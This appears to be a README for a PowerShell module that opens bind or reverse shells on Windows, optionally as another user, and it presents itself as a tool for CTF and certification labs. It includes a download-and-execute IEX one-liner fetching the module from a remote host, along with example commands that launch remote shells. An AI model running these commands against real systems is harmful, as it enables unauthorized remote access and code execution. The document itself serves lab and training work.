A PowerShell module that can also function as a standalone script, enabling users to spawn either a bind or reverse shell. Additionally, it includes the capability to authenticate the shell session as a different Windows user.
⚠ This project is not intended for production use, as network traffic is transmitted in clear text. It was created for Capture The Flag (CTF) challenges and certification labs. In the future, I may integrate additional protocols and encryption methods. For now, this script serves as a simplified solution to challenges I have encountered in CTFs and labs. Use it at your own risk and only with a full understanding of its intended purpose.
IEX (Get-Content .\PowerRemoteShell.psm1 -Raw)
IEX (New-Object Net.WebClient).DownloadString('<protocol>://<host>:<port>/<uri>/PowerRemoteShell.psm1')
Or Invoke-🧠
Parameter | Type | Default | Description |
Address (*) | String | None | For 'Reverse' mode, this specifies the remote machine to connect to (e.g., a Netcat listener). For 'Bind' mode, this defines the interface to bind to (e.g., to listen on all interfaces). |
Port (*) | Integer (Word) | None | For 'Reverse' mode, this specifies the port on the remote machine to connect to. For 'Bind' mode, this defines the port to listen on. |
Mode (*) | Choice | None | Defines the type of remote shell: 'Reverse' (initiates a connection back to a listener) or 'Bind' (opens a port and waits for an incoming connection). |
ShellKind | Choice | PowerShell | Specifies the shell application to capture and redirect to the network socket. Options include 'PowerShell', 'Cmd', or the default shell defined by the 'COMSPEC' environment variable. |
Username | String | None | An existing Microsoft Windows local user account. |
Password | String | None | Password of specified user account. |
Domain | String | None | specify the domain of the user account under which the new process is to be started. |
= Mandatory Options
# Listen on all interfaces ( on port 2801 and spawn a command-line shell as the current user.
Invoke-RemoteShell -Address -Port 2801 -Mode "bind" -ShellKind "cmd"
# Connect to the remote listener at and spawn a PowerShell shell as the current user.
Invoke-RemoteShell -Address -Port 1403 -Mode "reverse"
# Listen on (only) on port 1403 and spawn a PowerShell shell as the user 'darkcodersc'.
Invoke-RemoteShell -Address -Port 1403 -Mode "bind" -Username "darkcodersc" -Password "mypassword"
Demonstrate a bind shell at the top, running as the currently logged-in user, and a reverse shell at the bottom, connecting as the user 'dark'.